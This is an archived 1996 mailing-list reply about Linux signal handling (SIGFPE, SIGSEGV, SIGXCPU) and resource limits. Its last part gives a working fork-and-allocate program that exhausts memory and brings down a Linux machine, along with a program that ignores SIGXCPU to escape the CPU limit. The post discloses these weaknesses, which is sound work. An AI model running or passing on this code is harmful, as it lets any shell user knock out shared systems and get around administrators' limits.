Re: signal(SIGFPE,SIG_IGN), possible solution?

SuperUser (root@moisil.wien.rhno.columbia.edu)
Tue, 23 Apr 1996 22:22:39 -0400


On Tue, 23 Apr 1996, Andreas Kostyrka wrote:

> I was just thinking, and the following solution occurred to me, so I just
> want to know if this is possible:
>
> 1) When SIGFPE is being ignored, we want x/0 to return some constant
> value, let's say 0, and continue with the next statement.
> 2) The important thing is whether the FPU signals SIGFPE precisely
> enough that we can be sure we got SIGFPE because of x/0 and not some
> other cause.
> 3) The FPU has a stack architecture, that much I know about Intel FPUs :)
> 4) Now we could just pop the two arguments from the stack, and because
> on return it will execute the fdiv instruction again, we push, say,
> 0.0 and 100.0 onto the stack and re-execute the fdiv. It should now
> compute 0.0/100.0 == 0.0 and all is well.
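
For concreteness, a minimal user-space sketch of the "substitute a
constant and continue" idea - not the in-kernel FPU-stack fixup described
above, but the same effect via sigsetjmp()/siglongjmp(), using integer
division, which reliably raises SIGFPE on x86 (the function names are
mine):

#include <signal.h>
#include <setjmp.h>
#include <stdio.h>

static sigjmp_buf env;

/* Jump back to the checkpoint instead of returning, which would make
   the kernel restart the faulting divide instruction forever. */
static void fpe_handler(int sig)
{
    siglongjmp(env, 1);
}

/* Divide x by y, substituting 0 when the division traps. */
static long safe_div(long x, long y)
{
    if (sigsetjmp(env, 1))
        return 0;               /* arrived here via SIGFPE */
    return x / y;
}

int main()
{
    signal(SIGFPE, fpe_handler);
    printf("10/2 = %ld\n", safe_div(10, 2));
    printf("10/0 = %ld\n", safe_div(10, 0));
    return 0;
}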

While the FPU-fixup idea might be a good solution for the SIGFPE example,
it does little for a similar example involving SIGSEGV:

#include <signal.h>

int main()
{
    signal(SIGSEGV, SIG_IGN);   /* ask the kernel to ignore SIGSEGV */
    *(char *)0 = 0;             /* faults, gets restarted, faults again... */
    return 0;                   /* never reached */
}

This will happily run until ulimit, root or a shutdown kills it. :) Since
the signal is ignored, the kernel just restarts the faulting instruction,
which faults again, so the process spins forever. Okay, telling the kernel
to ignore SIGSEGV is certainly nothing more than asking for trouble (maybe
it should be forbidden?), and it's not much worse than a while(1); hanging
around. However, I've seen processes (pine 3.91) running for hours, even
with ulimit in place, segfaulting like crazy and raising the load average
by 1. I suppose that pine also intercepts SIGXCPU (I haven't looked
through the code), so the CPU ulimit has no effect - maybe that should be
forbidden, too?
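
For what it's worth, a minimal sketch of that loophole - not pine's
actual code, just the mechanism as I understand it: exceeding the soft
CPU limit makes the kernel send SIGXCPU, and a process that ignores it
keeps running until the hard limit finally delivers SIGKILL:

#include <signal.h>
#include <sys/time.h>
#include <sys/resource.h>

int main()
{
    struct rlimit rl;

    /* Set a soft CPU limit of 1 second; leave the hard limit alone. */
    getrlimit(RLIMIT_CPU, &rl);
    rl.rlim_cur = 1;
    setrlimit(RLIMIT_CPU, &rl);

    /* SIGXCPU's default action kills the process when the soft limit
       is exceeded; ignoring it defeats the limit entirely. */
    signal(SIGXCPU, SIG_IGN);

    for (;;)
        ;                       /* burn CPU well past the limit */
}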

Anyway, as I said, this is only mildly annoying. What is _really_ bad is
that any user with a shell account can kill a Linux machine using something
like this:

#include <stdlib.h>
#include <unistd.h>

#define MEM 1000000

int main()
{
    char *p;
    long i;

    p = malloc(MEM);   /* no error check: once memory runs out, the
                          write below kills this copy, but its clones
                          live on */
    fork();            /* double the number of processes */
    i = MEM;
    while (i--)
        p[i] = i;      /* touch every page so it really gets allocated */
    return main();     /* start over: allocate, fork, touch, ... */
}

This works on machines that use ulimit for memory - a slightly modified
version can easily be written for machines without it. What happens is
pretty clear: the program and its clones allocate all the available
virtual memory, so when init or some other daemon needs memory, there
isn't any left... This small program does _not_ kill a SunOS box (with
or without ulimit), although it renders the machine pretty much unusable.

Oh, and by the way, libc-5.3.9 _ignores_ the ulimit settings for memory,
while 5.0.9 and 5.2.18 are just fine.
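
A quick way to check a given libc (just a sketch; it assumes malloc()
draws from the data segment via brk() - if 5.3.9's malloc switched to
mmap(), RLIMIT_DATA simply no longer constrains it, which would explain
the behaviour):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <sys/resource.h>

int main()
{
    struct rlimit rl;
    char *p;

    /* Cap the data segment at 4 MB, then try to allocate 8 MB. */
    rl.rlim_cur = rl.rlim_max = 4 * 1024 * 1024;
    setrlimit(RLIMIT_DATA, &rl);

    p = malloc(8 * 1024 * 1024);
    if (p == NULL) {
        printf("malloc failed - the limit is respected\n");
    } else {
        memset(p, 0, 8 * 1024 * 1024);  /* actually touch the pages */
        printf("malloc and writes succeeded - the limit is ignored\n");
    }
    return 0;
}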

Ionut